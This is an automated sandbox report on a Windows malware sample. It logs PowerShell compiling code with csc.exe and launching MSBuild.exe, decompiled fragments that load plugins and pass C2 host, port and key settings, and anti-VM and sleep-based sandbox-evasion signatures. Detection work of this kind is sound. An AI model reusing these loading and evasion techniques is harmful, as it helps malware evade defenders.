Source: C:\Windows\System32\notepad.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: q8C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.pdb source: powershell.exe, 00000000.00000002.1658041352.00000000054CA000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.5538044.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.5538044.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, Messages.cs .Net Code: Memory
Source: 0.2.powershell.exe.5538044.3.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.5538044.3.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.5538044.3.raw.unpack, Messages.cs .Net Code: Memory
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.cmdline" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_04833AD9 push ebx; retf 0_2_04833ADA
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 11E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2D30000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2AC0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3335 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 9611 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6504 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4820 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2564 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2688 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1912 Thread sleep count: 9611 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1912 Thread sleep count: 244 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000000.00000002.1667942190.0000000006EEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: MSBuild.exe, 00000007.00000002.4096151182.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
